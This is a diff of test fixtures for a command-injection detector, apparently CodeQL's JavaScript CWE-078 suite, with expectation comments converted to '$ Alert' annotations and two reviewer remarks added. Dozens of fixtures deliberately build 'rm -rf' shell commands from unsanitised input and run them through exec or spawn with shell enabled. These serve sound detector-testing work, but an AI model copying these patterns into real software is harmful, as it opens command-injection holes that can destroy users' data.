@@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..5b58e1afe4f2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -3,5 +3,5 @@ const cp = require("child_process"); module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..c7e35029966b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js 
@@ -1,30 +1,30 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function cla() { } cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports = new cla(); function cla2() { } cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.bla = new cla2(); @@ -32,29 +32,29 @@ module.exports.lib2 = require("./lib2.js") class Cla3 { constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } bar(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. + require("mz/child_process").exec("rm -rf " + name); // $ Alert } module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. + var cmd1 = "rm -rf " + name; // $ Alert cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert function myExec(cmd) { cp.exec(cmd); } 
@@ -62,73 +62,73 @@ module.exports.flow = function (name) { } module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. 
+ cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { wha(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static bla(name) { @@ -146,7 +146,7 @@ function Cla5(name) { module.exports.cla5 = new Cla5(); module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK + let cmd = "rm -rf " + name; // $ Alert let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); @@ -156,7 +156,7 @@ module.exports.indirect2 = function (name) { let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); let cmd2 = "rm -rf " + name; var args2 = [cmd2]; 
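Review bot: `cp.exec(util.format("for foo in (%s) do bar end", name));` keeps no expectation, while the equivalent concatenation `cp.exec("for foo in (" + name + ") do bla end"); // $ Alert` in `stringConcat` is expected to alert. If the `util.format` variant is a known gap in the query rather than intended behaviour, the new framework can record that with `// $ MISSING: Alert` (as this commit does elsewhere in uselesscat.js) instead of leaving the line indistinguishable from a deliberate negative case; if it is intended, a short `// OK - ...` comment saying why would avoid the question recurring. The `format` function that contains the line lies entirely within the hunk.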
@@ -168,64 +168,64 @@ module.exports.indirect2 = function (name) { } module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + cp.exec("rm -rf " + broken); // $ Alert } var path = require("path"); module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. 
[INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { 
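Review bot: The guard in `blackList2`, `if (!/^([a-zA-Z0-9]+))?$/.test(name)) {`, has an unbalanced `)` and is not a valid regular-expression literal as written; it is a context line, so this commit did not introduce it, but the fixture is meant to exercise a character-allowlist check and probably intends `/^([a-zA-Z0-9]+)?$/`. Worth a separate fix so the test code matches what the `$ Alert` and `$ SPURIOUS: Alert` expectations on the following lines describe.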
@@ -246,39 +246,39 @@ var cleanInput = function (s) { } module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK + cp.exec("rm -rf " + obj.version); // $ Alert obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + cp.exec("rm -rf " + opts.bla); // $ Alert this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert } } 
@@ -305,24 +305,24 @@ function sanitizeShellString(str) { } module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK + cp.exec("rm -rf " + id(n)); // $ Alert }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert } Object.defineProperty(module.exports, "boundProblem", { @@ -363,7 +363,7 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK + var command = "learn " + this.learn_args + " " + model; // $ Alert cp.exec(command); } }; 
@@ -403,27 +403,27 @@ function yetAnohterSanitizer(str) { } module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK + arr.push(name); // $ Alert spawn("rm", arr, SPAWN_OPT); spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. } @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } const myFuncs = { myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } }; 
@@ -475,12 +475,12 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK + let args = ' my name is ' + name; // $ Alert let cmd = 'echo'; cp.exec(cmd + args); } @@ -496,7 +496,7 @@ module.exports.myCommand = function (myCommand) { }; module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + MyThing.cp.exec("rm -rf " + name); // $ Alert } }); 
@@ -507,49 +507,49 @@ for (var name in imp){ } module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.shellThing = function (name) { function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } indirectShell("rm", ["-rf", name], {shell: true}); 
@@ -557,40 +557,40 @@ module.exports.shellThing = function (name) { module.exports.badSanitizer = function (name) { if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } if (!name.match(/^\w{1,64}$/)) { // <- good sanitizer - exec("rm -rf " + name); // NOT OK + exec("rm -rf " + name); // $ Alert } else { - exec("rm -rf " + name); // OK + exec("rm -rf " + name); } } module.exports.safeWithBool = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isSafeName(name) === true) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isSafeName(name) == false) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function indirectThing(name) { 
@@ -606,36 +606,36 @@ function moreIndirect(name) { } module.exports.veryIndeirect = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (indirectThing(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (indirectThing2(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (moreIndirect(name) !== false) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(new RegExp("\'"), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // NOT OK + cp.exec("rm -rf " + sanitized); // $ Alert var sanitized = "'" + name.replace(new RegExp("\'", 'g'), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var sanitized = "'" + name.replace(new RegExp("\'", unknownFlags()), "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK -- Most likely should be okay and not flagged to reduce false positives. + cp.exec("rm -rf " + sanitized); // OK - Most likely should be okay and not flagged to reduce false positives. } diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js index db1ecd02413f..6dc040fd7800 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib2.js 
@@ -1,9 +1,9 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - is imported from main module. + cp.exec("rm -rf " + name); // $ Alert - is imported from main module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js index b107ac03d7ae..1f512e8c3817 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/other.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // OK, is not exported to a main-module. + cp.exec("rm -rf " + name); // OK - is not exported to a main-module. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js index a594c2182392..df2b9bd82e60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/amdSub.js @@ -1,5 +1,5 @@ const cp = require("child_process"); module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this function is exported from `amd.js` + cp.exec("rm -rf " + name); // $ Alert - this function is exported from `amd.js` }; \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js index 6e7d3498723d..ba4bd7089693 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib/index.js @@ -1,15 +1,15 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK - this is being called explicitly from child_process-test.js + cp.exec("rm -rf " + name); // $ Alert - this is being called explicitly from child_process-test.js }; module.exports.amd = require("./amd.js"); module.exports.arrToShell = function (cmd, arr) { - cp.spawn("echo", arr, {shell: true}); // NOT OK + cp.spawn("echo", arr, {shell: true}); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts index 1e945f15e724..f2e6b7672f89 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") export default function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. } 
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js index c46fed331815..67890f50fe82 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib2/special-file.js @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - the "files" directory points to this file. + cp.exec("rm -rf " + name); // $ Alert - the "files" directory points to this file. }; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts index 9fa88413cc88..8a79d2d66a66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib3/my-file.ts @@ -1,5 +1,5 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js index 952288a82cef..bc9e51562033 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/subLib4/subsub.js @@ -1,5 +1,5 @@ const cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK - functions exported as part of a submodule are also flagged. + cp.exec("rm -rf " + name); // $ Alert - functions exported as part of a submodule are also flagged. }; diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js index 9654b26dec03..d5230dab17f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UselessUseOfCat/uselesscat.js @@ -7,21 +7,21 @@ var spawnSync = child_process.spawnSync; var fs = require('fs'); var app = express(); -exec("cat foo/bar", function (err, out) {}); // NOT OK +exec("cat foo/bar", function (err, out) {}); // $ Alert -exec("cat /proc/" + id + "/status", function (err, out) { // NOT OK +exec("cat /proc/" + id + "/status", function (err, out) { // $ Alert console.log(out); }); -execSync('cat /proc/cpuinfo').toString(); // NOT OK. +execSync('cat /proc/cpuinfo').toString(); // $ Alert -execSync(`cat ${newpath}`) // NOT OK +execSync(`cat ${newpath}`) // $ Alert execSync('cat package.json | wc -l'); // OK - pipes! -execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK multiple files. +execSync('cat /proc/cpuinfo /foo/bar').toString(); // OK - multiple files. -execSync(`cat ${newpath} /foo/bar`).toString(); // OK multiple files. +execSync(`cat ${newpath} /foo/bar`).toString(); // OK - multiple files. exec(`cat ${newpath} | grep foo`, function (err, out) { }) // OK - pipes 
@@ -29,73 +29,73 @@ execSync(`cat ${newpath}`, {uid: 1000}) // OK - non trivial options exec('cat *.js | wc -l', { cwd: './' }, function (err, out) { }); // OK - wildcard and pipes -execSync(`cat foo/bar/${newpath}`); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // NOT OK ("encoding" is used EXACTLY the same way in fs.readFileSync) +execSync(`cat foo/bar/${newpath}`, {encoding: 'utf8'}); // $ Alert - "encoding" is used EXACTLY the same way in fs.readFileSync -execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK (fs.readFileSync cannot emulate uid / gid)) +execSync("/bin/cat /proc/cpuinfo", { uid: 1000, gid: 1000, encoding: 'utf8'}); // OK - (fs.readFileSync cannot emulate uid / gid)) -execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); // OK. +execSync('cat /proc/cpuinfo > foo/bar/baz').toString(); -execSync(`cat ${newpath} > ${destpath}`).toString(); // OK. 
+execSync(`cat ${newpath} > ${destpath}`).toString(); -execSync(`cat ${files.join(' ')} > ${outFile}`); // OK +execSync(`cat ${files.join(' ')} > ${outFile}`); -execSync(`cat ${files.join(' ')}`); // OK - but flagged - not just a simple file read [INCONSISTENCY] +execSync(`cat ${files.join(' ')}`); // $ SPURIOUS: Alert - - but flagged - not just a simple file read exec("cat /proc/cpuinfo | grep name"); // OK - pipes execSync(`cat ${newpath} | ${othertool}`); // OK - pipes function cat(file) { - return execSync('cat ' + file).toString(); // NOT OK + return execSync('cat ' + file).toString(); // $ Alert } -execSync("sh -c 'cat " + newpath + "'"); // NOT OK - but not flagged [INCONSISTENCY] +execSync("sh -c 'cat " + newpath + "'"); // $ MISSING: Alert var execFile = child_process.execFile; var execFileSync = child_process.execFileSync; -execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // NOT OK +execFile('/bin/cat', [ 'pom.xml' ], function(error, stdout, stderr ) { // $ Alert // Not using stderr console.log(stdout); }); -execFile('/bin/cat', [ 'pom.xml' ], 